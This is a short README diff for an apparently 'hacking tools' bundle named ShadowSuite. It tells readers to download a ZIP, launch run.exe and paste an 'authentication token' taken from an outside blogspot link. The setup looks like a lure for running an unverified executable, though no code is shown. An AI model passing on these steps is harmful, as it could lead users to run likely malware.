the-hollowclan/ShadowSuite/README.md

 - Download ShadowSuite.zip
 - Extract the downloaded ZIP to a folder, e.g Desktop
 - Start "run.exe" to start the application

+# HOW TO INSTALL HACKING TOOLS IN SHADOWSUITE
+- Start run.exe
+- Select a tool to install
+- Click Install on the right panel
+- Paste <a href="blacksamaritan.blogspot.com">AUTHENTICATION TOKEN</a> and Launch after installation